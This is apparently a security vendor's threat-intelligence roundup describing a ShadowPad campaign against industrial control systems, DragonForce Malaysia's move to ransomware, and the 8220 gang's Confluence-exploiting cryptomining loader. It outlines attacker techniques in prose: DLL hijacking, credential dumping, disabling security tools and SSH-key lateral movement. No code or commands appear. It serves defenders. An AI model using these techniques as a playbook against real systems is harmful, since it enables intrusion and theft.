Tanium Cyber Threat Intelligence Roundup

In this report, we explore how a Chinese-speaking advanced persistent threat (APT) is conducting attacks on industrial control systems (ICS) by leveraging a revamped ShadowPad backdoor variant. In addition, the DragonForce hacktivist collective is claiming to be pivoting away from activism and towards cybercrime – primarily by deploying ransomware. And finally, Microsoft is now warning about major upgrades to the 8220 gang’s arsenal, which supports the group’s cryptotheft activity and is actively exploiting a Confluence vulnerability.

Let’s take a closer look at these developing stories.

1. Suspected Chinese APT group uses ShadowPad to attack industrial control systems

A new Kaspersky report describes an active campaign leveraging the ShadowPad backdoor in attacks targeting several industrial control systems (ICS) belonging to telecommunications entities in the Middle East. This wave of attacks, which specifically targets engineering computers in building automation systems (BAS), started in mid-October 2021.

During the investigation of the campaign, researchers found evidence of larger-scale activity and identified additional victims. Furthermore, Kaspersky claims that the campaign is similar to attacks from March 2021 involving an earlier version of the ShadowPad backdoor, as well as the use of a similar set of tactics, techniques, and procedures (TTPs) deployed against logistics and transport organizations at a port in Malaysia.

Key takeaways

• Some of the targeted organizations are victims of the CVE-2021-26855 vulnerability in Microsoft Exchange.
• From March to at least October 2021, the ShadowPad backdoor was downloaded to victim computers as the mscoree.dll file, launched by AppLaunch.exe – a legitimate application executed via the creation of a task in Windows Task Scheduler.
• Later the attackers launched ShadowPad using DLL hijacking in a legitimate OLE-COM object viewing application (OleView).
• After the initial infection, the attackers sent commands manually, then automatically.
• The attackers used domains registered with NameSilo, GoDaddy.com, and ENOM to communicate with the command-and-control (C2) servers. Most of the C2 servers were hosted on dedicated servers rented from managed services provider (MSP) Choopa.

Kaspersky claims that the group used additional tools during the campaign. This includes the ever-popular Cobalt Strike framework, which they downloaded to victim machines using the certutil.exe utility, compiled aspx web shells, and procdump and Mimikatz tools. Additional tools observed being leveraged by the attackers include the PlugX backdoor, BAT files for stealing credentials, web shells for gaining remote access to the web server, and the Nextnet utility for scanning network hosts.

Post-exploitation activity involves the distribution of a malicious script for cmd.exe over victim networks. The script was added to the task scheduler to perform daily execution. There are several commands within the script, but its general goal is to gather system and user information, copy files and stage them for exfiltration, mount network drives using legitimate domain accounts (evidence that the attackers stole domain authentication credentials from at least one account in each attacked organization), launch the Mimikatz credential dumper, and more. Kaspersky asserts that this latter part of the attackers’ TTP strategy is unique, and further supports the researchers’ claims of Chinese state involvement.

ShadowPad: A brief overview

ShadowPad is an advanced modular remote access trojan (RAT) that various Chinese threat groups have used – and are using – to launch attacks against private networks. ShadowPad first appeared back in 2017 and remains a popular attack mechanism.

In the above-mentioned campaign, the ShadowPad backdoor was downloaded on the attacked computers under the guise of the mscoree.dll file, which was launched by the legitimate application AppLaunch.exe located in the same folder as ShadowPad. AppLaunch.exe was executed by creating a task in the Windows Task Scheduler.

New methodology: As mentioned above, Kaspersky claims that since about mid-October 2021, the attackers are using a unique new ShadowPad launching scheme and a new malware version to target the same types of organizations. Instead of using mscoree.dll, the attackers are now using the DLL hijacking technique, abusing legitimate software for viewing OLE-COM objects (OleView). The legitimate OleView application downloads the malicious IVIEWERS.dll library, which in turn downloads and executes the ShadowPad payload contained in IVIEWERS.dll.dat. The Windows Task Scheduler was also used by the new ShadowPad version to achieve and maintain a foothold in targeted systems.

A more detailed analysis of modifications made to the new ShadowPad variant is presented in a recent report published by PwC.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“The emergence of a new ShadowPad variant is worrying, as it has previously been used by various Chinese APTs with some success – and has proven itself a reliable asset for threat actors seeking to engage in supply-chain attacks. CTI is of the opinion that Kaspersky is right on the money with regards to its claims of attribution (although ShadowPad has been leveraged by a variety of state-sponsored APTs over the years), as both the targeted regions and the victimology displayed in these attacks align with traditional Chinese state interests and are frequent victims of the regime’s state-backed cyberespionage attacks. ShadowPad is believed to have been developed by threat actors affiliated with China’s Bronze Atlas APT, and subsequently shared with China’s Ministry of State Security (MSS) and the People’s Liberation Army (PLA) – and by extension, their many hacker affiliates.”

2. Hacktivist group DragonForce Malaysia releases Windows LPE exploit, discloses plans to evolve into a ransomware group

A recent threat intelligence post by CloudSEK details a new exploit from hacktivist group DragonForce Malaysia that is capable of performing local privilege escalation (LPE) on Windows servers and local distribution router (LDR) actions on India-based servers.

Who is DragonForce Malaysia?

DragonForce is a Malaysia-based hacktivist group which was once considered comparable to the more well-known Anonymous organization. This hacktivist collective has even described itself as a group “based on ethics and principles that bring good,” and operates social media channels which generate tens of thousands of visitors.

The operation is known for attacking organizations and government entities across the Middle East and Asia. DragonForce’s favorite target is Israel, as evidenced by its launching of multiple operations against the nation and its citizens. The group also owns and operates an online forum where it posts announcements, discusses its latest activities, and conducts recruitment and promotional campaigns using TikTok and Instagram.

Notable activity

The operation’s most recent campaign, OpsPatuk, hit India with a wave of attacks in response to controversial comments by some Indian politicians. Radware released an advisory detailing the campaign which included vulnerabilities exploited, IOCs, and identified additional threat groups involved in the campaign.

DragonForce, like many hacktivist groups, is known for working with other cybercriminal gangs to achieve its goals. The group has followed in the footsteps of other hacktivists by resurfacing during the Russia/Ukraine conflict.

Historically, DragonForce has relied on publicly available attack tools to conduct its campaigns. The group’s pivot towards non-publicly available attack tools marks a significant departure from its usual methods – and perhaps signals some improvement in the group’s technical sophistication. However, this growth does not appear to extend to the group’s choices concerning operational security (OPSEC).

DragonForce recently posted a video detailing its newest exploit, attributing its development to a threat actor named ‘impossible1337.’ The exploit is designed to target Windows server LPE and LDR vulnerabilities, but further technical information about the exploit is not yet publicly available.

The video then shifts direction, as the threat actor details its plan to convert to a ransomware group; even going so far as to preview a ransom note sample to prove the seriousness of its intentions. Following the video, the group published a blog on its website reiterating its goals of conducting large-scale ransomware attacks.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“What’s most notable about this story is the fact that a hacktivist group is creating its own exploits and making the leap from hacktivism to ransomware – evidence of a conscious decision to make the leap to financially-motivated crime. This shift is significant, as most hacktivists at least attempt to maintain an appearance that conveys a well-intentioned mission; and usually don’t publicize any desires to illegally obtain money via cybercrime. This shift in DragonForce’s motivations may serve as further evidence that the incredible (and increasing) amount of money generated by the ransomware industry is getting too hard to ignore, even for those who started out professing to ‘bring good’ to the world, as DragonForce once claimed.

It’s also interesting that the group posted a video detailing its newest exploit while also announcing its plans to move to ransomware. Considering this group has been upfront about its targeted victims, it has essentially given its targets (as well as law enforcement) a ‘heads up’ as far as what to expect from them in the future. In this case, DragonForce is giving prospective victims a chance to patch Windows servers in advance of a potential Windows LPE or LDR attack.”

3. Microsoft warns: Linux-targeting malware received a big update

Microsoft’s Threat Intelligence Center (MSTIC) posted a series of tweets highlighting significant updates to the TTPs associated with the 8200 gang, a threat actor behind a long-running malware campaign targeting Linux systems.

The Twitter thread describes the campaign’s recent activity and updates to the threat actor’s TTPs and concludes with the indicators of compromise (IOCs) associated with 8220’s latest attacks – the goal of which appear to be financially motivated, as they involve cryptomining.

Who is the 8220 gang?

The 8220 gang is a Chinese-speaking, Monero-mining threat actor first observed in 2017. The ‘8220’ moniker refers to the actor’s preference for leveraging port 8220 for its C2 communications.

This group is known for infecting hosts using common cloud services, by leveraging a custom miner and Internet relay chat (IRC) bot in support of further attacks and obtaining remote access to victims. Looking at their latest activity, it seems this was the methodology that proved to be the most successful, as 8220 has apparently decided to stick with similar TTPs up until the present day.

Atlassian disclosed a critical bug affecting its Confluence Server and Data Center products (tracked as CVE-2022-26134) on June 2, 2022. Within a week, security firm Check Point counted the 8220 gang among the handful of threat actors exploiting the zero-day flaw to download cryptomining software. This was evidenced by discoveries made by Check Point’s researchers, who during an investigation were able to extract from an infected system a domain and crypto wallet previously linked to 8220.

MSTIC reports that over the last year the group has actively updated its techniques and payloads. Its recent campaign targets i686 and x86_64 Linux systems and uses RCE exploits for CVE-2022-26134 (Confluence) and CVE-2019-2725 (WebLogic) for initial access.

Key takeaways

Updates to 8220 TTPs and tools reportedly include the following:

• New cryptominer variant
• New IRC bot
• Use of an exploit for a recently disclosed vulnerability (CVE-2022-26134)
• Use of a loader with detection evasion capabilities that downloads the latest variant of the pwnRig cryptominer and the above-mentioned IRC bot which runs commands from a C2 server. The loader can survive reboots by creating a scheduled task via a cron job or a script that runs every minute as a nohup (no hangup) command.

According to Microsoft, after the 8220 gang gains initial access via CVE-2022-26134, it downloads the aforementioned loader to the system which then changes the host’s configurations to disable security services, downloads a cryptominer, establishes persistence on the target network, and then scans the network (via the use of the MASSCAN port scanning tool) to find other potentially vulnerable servers. Propagation is achieved with the aid of the GoLang-based SSH brute force tool, Spirit. The loader also scans the local disk for SSH keys with which the actor can potentially move laterally by connecting to trusted hosts.

Because the loader can clear log files and disables cloud monitoring and other security tools, Microsoft is warning admins to enable Defender for Endpoint tamper protection features.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“This is technically not a new threat, but rather an updated and more effective version of an existing one. As this story suggests, Microsoft is increasing its efforts to bring awareness to Linux-targeting malware — an initiative CTI believes should be commended. With regards to the 8220 gang’s updated arsenal, this is the output of a threat actor who has landed on a methodology that has proven successful, and thus has apparently spent the last year updating its malware and deployment techniques in what CTI would describe as an attempt to increase its attacks’ rates of success even further. This shows a high degree of dedication and is also indicative of a group for which cryptomining is a true occupation, as opposed to a side gig. 8220’s increasing sophistication is a sign that its methods are working, as this kind of development takes time, but more importantly, financial resources. The bottom line is that 8220 is an emerging threat and should be treated as such.”

Explore the Tanium Community

Cyberthreats are always evolving, which is why it’s important to stay in the loop about the latest developments. And here at Tanium, we are committed to helping you stay informed and prepared.

Be sure to check back soon for our next intelligence roundup. In the meantime, you can discover emerging cybersecurity issues, announcements, and discussion forums on our Tanium Community.